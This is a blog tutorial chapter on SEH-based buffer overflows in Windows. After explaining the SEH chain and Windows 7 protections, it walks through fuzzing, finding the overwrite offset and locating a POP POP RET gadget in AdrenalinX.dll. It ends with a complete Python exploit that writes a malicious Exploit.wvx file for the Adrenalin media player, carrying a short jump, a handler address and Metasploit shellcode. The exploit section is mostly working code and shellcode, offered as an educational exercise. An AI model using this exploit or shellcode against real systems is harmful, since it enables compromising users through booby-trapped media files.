Sunday, November 18, 2018

28. Python SEH Based Buffer Overflow

28. SEH Based Buffer Overflow

28.1 Introduction

28.1.1 The Basic Concept of SEH

First, let’s discuss the concept of the SEH (Structured Exception Handler). SEH is the exception handling mechanism provided by the Windows operating system. It is organised as a chain, i.e. a linked list of handler records.


 Figure 28-1 Behavior of the SEH chain

If an exception occurs, the operating system handles it by walking the SEH chain. Each handler that can handle the exception is executed in turn; a handler that cannot is skipped and the next one is tried. The last SEH in the chain points to “0xFFFFFFFF”, which passes the exception on to the kernel. SEH solves a practical problem: not every exception can be handled at the developer level, so with this mechanism the application can run more reliably.

Windows 7 implements several techniques to block buffer overflow attacks that abuse SEH. The first is “CPU Zeroing”, which resets the value of all registers to zero when the SEH is called; as mentioned earlier, simply executing a “JMP ESP” instruction is therefore no longer enough to hack the system. The second is SEHOP (Structured Exception Handler Overwrite Protection), which validates the chain before moving to the next SEH handler address. The last is SafeSEH, which limits the addresses that can be used as exception handler addresses. When all three techniques are in place, hacking with a buffer overflow attack becomes very difficult. In the rest of this chapter, let's find a way to bypass the security technology implemented in Windows 7 in order to learn about SEH buffer overflow techniques.

28.1.2 Basic Concepts of the SEH Buffer Overflow

 Figure 28-2 Behavior of the SEH Chain

When an exception occurs, the EXCEPTION_DISPOSITION Handler structure used for exception handling is placed at the top of the stack. The second item of this structure contains the address that points to the next SEH. The core of the SEH buffer overflow attack is to take advantage of the characteristics of this structure. The detailed operation is as follows.

(1) EXCEPTION_DISPOSITION Handler: The structure used for exception handling is placed on the stack.

(2) Running SEH: The operating system runs the Opcode in the address to which the SEH points. Set the input value in advance to make the SEH have an address that points to the “POP POP RET” instruction.

(3) Running POP POP RET: Remove the top two values from the stack and return to the address held in the third value. The “44 BB 00 00” value corresponds to the next SEH address that was set when the operating system generated the exception.

(4) Running JMP: Execute the command to jump by 6 bytes.

(5) Running Shell Code: Finally, run the shell code you entered for hacking.
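To make the chain walk and the Windows 7 checks concrete, here is an added Python model (not code from the original post): it builds a small SEH chain, applies the 8-byte overwrite used in this chapter (next SEH “\xeb\x06\x90\x90”, handler “\xcd\xda\x13\x10”) and shows why a SEHOP-style chain validation rejects it while a module without a SafeSEH table does not. Stack bounds, record addresses and the module map are constructed for illustration.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF                      # terminator of the SEH linked list
STACK_LO, STACK_HI = 0x0012E000, 0x00130000    # constructed stack bounds
FINAL_HANDLER = 0x77E00000                     # stand-in for ntdll's final handler

def make_stack():
    """Constructed stack: record address -> (next SEH record, handler address)."""
    return {
        0x0012FF70: (0x0012FFB0, 0x00401500),       # application's own handler
        0x0012FFB0: (END_OF_CHAIN, FINAL_HANDLER),  # last record -> kernel
    }

def overwrite_record(stack, addr, next_bytes, handler_bytes):
    """Apply the 8 bytes an overflow writes over one SEH record (little-endian)."""
    stack[addr] = (struct.unpack('<I', next_bytes)[0],
                   struct.unpack('<I', handler_bytes)[0])

def sehop_ok(stack, head):
    """SEHOP model: every 'next' pointer must lead to a valid, aligned record
    on the stack and the chain must end at the final handler."""
    addr, seen = head, set()
    while addr != END_OF_CHAIN:
        if (addr in seen or addr % 4 or not STACK_LO <= addr < STACK_HI
                or addr not in stack):
            return False                       # chain broken: refuse to dispatch
        seen.add(addr)
        nxt, handler = stack[addr]
        if nxt == END_OF_CHAIN:
            return handler == FINAL_HANDLER
        addr = nxt
    return False                               # empty chain: nothing to dispatch

# Constructed module map: base, size, SafeSEH table (None = image built
# without SafeSEH, so any address inside it is accepted as a handler).
MODULES = {
    'AdrenalinX.dll': (0x10000000, 0x00200000, None),
    'ntdll.dll':      (0x77E00000, 0x00100000, {FINAL_HANDLER}),
}

def safeseh_ok(handler, modules=MODULES):
    """SafeSEH model: handlers on the stack are refused; inside a module that
    registered a handler table, only the listed addresses are allowed."""
    if STACK_LO <= handler < STACK_HI:
        return False
    for base, size, table in modules.values():
        if base <= handler < base + size:
            return table is None or handler in table
    return False                               # not inside any loaded module
```

The overwritten next SEH value 0x909006EB is not a stack record, so the SEHOP walk fails before the handler runs; the handler address 0x1013DACD passes the SafeSEH check only because the constructed AdrenalinX.dll entry has no table.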

You now have all the basic knowledge needed for an SEH buffer overflow attack. Let's write the code for the SEH buffer overflow attack in Python.

28.2 Fuzzing and Debugging

First, trigger an application error through fuzzing, then write the hacking code step by step with the help of the debugger. Let's build the Python code from the basic concepts described above.

 Figure 28-3 Hacking Procedures

The general procedure is similar to that for a stack-based buffer overflow, except that the SEH rather than the EIP is overwritten. Fuzzing reveals how much data is required to overwrite the SEH. The debugger is then used to find the address of a “POP POP RET” instruction, and this address is placed in the SEH field. With the hex code of a “short jmp” instruction placed in the next SEH field, the “Adrenalin” file that runs shell code supplied by the attacker is complete. This is how malware can be planted on a user's PC through a multimedia file downloaded from the Internet.
Sample code and the test application can be downloaded from “http://www.exploit-db.com/exploits/26525/”. The debugger script bufferOverflowTest.py is used without changes; just set the “processName” variable to “BlazeDVD.exe” instead of “Play.exe”. Once the downloaded application is installed, the test preparation is complete.

junk = b"\x41" * 2500            # 2,500 consecutive "A" characters
x = open('Exploit.wvx', 'wb')    # binary mode: write the bytes unchanged
x.write(junk)
x.close()

The behaviour of this example is similar to that of fuzzingBlazeDVD.py. First, create a file for the Adrenalin player consisting of consecutive “A” characters of arbitrary length (2,500 in the code above). Run the Adrenalin player and bufferOverflowTest.py, so that the player is being debugged. Finally, open the file “Exploit.wvx” in the player to trigger the error; the debugger then prints the following results on the screen.

 Figure 28-4 fuzzing test Result

In the previous chapter the register of interest was EIP; here it is the SEH. Look at the “SEH unwind” part at the end of the output: for the fuzzing test it shows the value that was entered in the “Exploit.wvx” file. What remains is to find out at which position of an input of a given length the SEH is overwritten.

28.3 SEH Overwrite

To determine exactly how many characters are needed to overwrite the SEH, generate a string that follows a known rule instead of repeated “A” characters. Combining the characters “a” to “z” with the digits “0” to “9” (letters in one direction, digits in the other) yields such a string, in which every position can be recognised.

Create the “Exploit.wvx” file by running the program, and then open it with the Adrenalin program. The error can be observed in the debugger. Now, let's look at the “SEH unwind” part, because the SEH is what we must overwrite. The first value is the “next SEH”, and the second corresponds to the “SEH”.

 Figure 28-5 Debugging Result

You can see “33313330” and “33333332” on the screen. Decoding these values into strings shows that they correspond to “3031” and “3233”. “3031” sits at the 2,140th position of the generated string. Therefore, fill the input with dummy characters up to the 2,140th position, and then put the address corresponding to the “POP POP RET” instruction.
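The post does not show its string generator, so here is an added Python version (not the original program) of the offset search: it builds a pattern from “a”–“z” and “0”–“9” in which every 4-byte window is unique, converts a dword as the debugger displays it (little-endian, so byte-reversed) back into memory bytes, and locates that position in the pattern. Because this constructed pattern differs from the post's, its values do not reproduce the “33313330” shown above.

```python
import string

def seh_pattern(length):
    """Constructed pattern: two letters and a digit per group ('aa0', 'aa1',
    ..., 'zz9'); 20,280 bytes before it repeats, every 4-byte window unique."""
    letters, digits = string.ascii_lowercase, string.digits
    cycle = ''.join(a + b + d for a in letters for b in letters for d in digits)
    return (cycle * (length // len(cycle) + 1))[:length].encode()

def memory_bytes(dword_text):
    """Turn a dword as the debugger prints it ('74633374') into the four bytes
    as they sit in memory; x86 is little-endian, so the order is reversed."""
    return bytes.fromhex(dword_text)[::-1]

def find_offset(pattern, dword_text):
    """Offset of the overwritten SEH field inside the pattern, -1 if absent."""
    return pattern.find(memory_bytes(dword_text))

def displayed_dword(pattern, offset):
    """Inverse helper: what the debugger would show for pattern[offset:offset+4]."""
    return pattern[offset:offset + 4][::-1].hex()

if __name__ == '__main__':
    pat = seh_pattern(2500)                # same length as the fuzzing file
    open('Exploit.wvx', 'wb').write(pat)   # file for the player, as in the post
    # after the crash, paste the "next SEH" dword from the debugger here:
    print(find_offset(pat, '74633374'))    # -> 2140 for this constructed pattern
```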

28.4 Find the “POP POP RET” Instruction

It is not easy to find the corresponding command with the “pydbg” module. For convenience, download the debugger from the following site “http://www.ollydbg.de/download.htm”. Unzip the downloaded file and use the debugger without performing an installation. After running the Adrenalin player first, run Ollydbg. Let's use the “attach” function from the Ollydbg “File” menu. Find “Play.exe” and attach it.

 Figure 28-6 Attach the Executable File

The debugger shows the state of the memory and the registers of the process on the screen. Now, let's check the execution module information that is contained in the memory. Select the executable modules from the “View” menu. This shows information related to all modules used in “Play.exe”.

 Figure 28-7 View Modules

Previously, I explained that Windows 7 has many security features to prevent hacking. To view the detailed information we need to inspect, an additional plug-in has to be installed. In general, the DLLs shipped with an application are more often vulnerable than the DLLs in the Windows directory, so the “AdrenalinX.dll” file is selected here to search for a “POP POP RET” instruction.

Double-click the DLL, then right-click and choose the “Search for a Sequence of Commands” menu. Type the instructions shown in the following figure to find their start address. When choosing an address, exclude any address that contains bytes such as “00”, “0A” or “0D”.

 Figure 28-8 Find Instructions

Continue the search until you find an address that is usable for the hack. Since the addresses in the first part of the module contain “00”, move to the second half before searching. This yields the following result.

 Figure 28-9 Finding Instruction result

28.5 Executing the Attack

Now we can complete the hacking program. The first 2,140 bytes are filled with a fixed character; the next SEH field holds the hex code of a jump over only 6 bytes; the SEH field holds the start address of the “POP POP RET” instruction; and finally the shell code that runs the Windows Calculator program is appended.

junk = b"\x41" * 2140                  # padding up to the SEH record
junk += b"\xeb\x06\x90\x90"             # next SEH: short jmp +6 over the handler address
junk += b"\xcd\xda\x13\x10"             # SEH: pop pop ret ***App Dll***
# Calc shellcode from msf (-b '\x00\x0a\x0d\x0b')
junk += (b"\xd9\xc8\xb8\xa0\x47\xcf\x09\xd9\x74\x24\xf4\x5f\x2b\xc9" +
b"\xb1\x32\x31\x47\x17\x83\xc7\x04\x03\xe7\x54\x2d\xfc\x1b" +
b"\xb2\x38\xff\xe3\x43\x5b\x89\x06\x72\x49\xed\x43\x27\x5d" +
b"\x65\x01\xc4\x16\x2b\xb1\x5f\x5a\xe4\xb6\xe8\xd1\xd2\xf9" +
b"\xe9\xd7\xda\x55\x29\x79\xa7\xa7\x7e\x59\x96\x68\x73\x98" +
b"\xdf\x94\x7c\xc8\x88\xd3\x2f\xfd\xbd\xa1\xf3\xfc\x11\xae" +
b"\x4c\x87\x14\x70\x38\x3d\x16\xa0\x91\x4a\x50\x58\x99\x15" +
b"\x41\x59\x4e\x46\xbd\x10\xfb\xbd\x35\xa3\x2d\x8c\xb6\x92" +
b"\x11\x43\x89\x1b\x9c\x9d\xcd\x9b\x7f\xe8\x25\xd8\x02\xeb" +
b"\xfd\xa3\xd8\x7e\xe0\x03\xaa\xd9\xc0\xb2\x7f\xbf\x83\xb8" +
b"\x34\xcb\xcc\xdc\xcb\x18\x67\xd8\x40\x9f\xa8\x69\x12\x84" +
b"\x6c\x32\xc0\xa5\x35\x9e\xa7\xda\x26\x46\x17\x7f\x2c\x64" +
b"\x4c\xf9\x6f\xe2\x93\x8b\x15\x4b\x93\x93\x15\xfb\xfc\xa2" +
b"\x9e\x94\x7b\x3b\x75\xd1\x7a\xca\x44\xcf\xeb\x75\x3d\xb2" +
b"\x71\x86\xeb\xf0\x8f\x05\x1e\x88\x6b\x15\x6b\x8d\x30\x91" +
b"\x87\xff\x29\x74\xa8\xac\x4a\x5d\xcb\x33\xd9\x3d\x0c")
x = open('Exploit.wvx', 'wb')           # binary mode: write the bytes unchanged
x.write(junk)
x.close()

Open the “Exploit.wvx” file produced by fuzzingAdrenalin.py with the Adrenalin program. The Windows Calculator program then starts, with the following result.

 Figure 28-10 SEH Based Buffer Overflow Result

Windows 7 can also effectively block the SEH-based buffer overflow attack. As described earlier, you can compile the program with the “SafeSEH ON” option. The most important keyword in hacking is the vulnerability: only after discovering one by analysing the system can the hacker attempt to attack it. The first step toward producing a safe program is therefore to follow the security recommendations provided by the vendor.


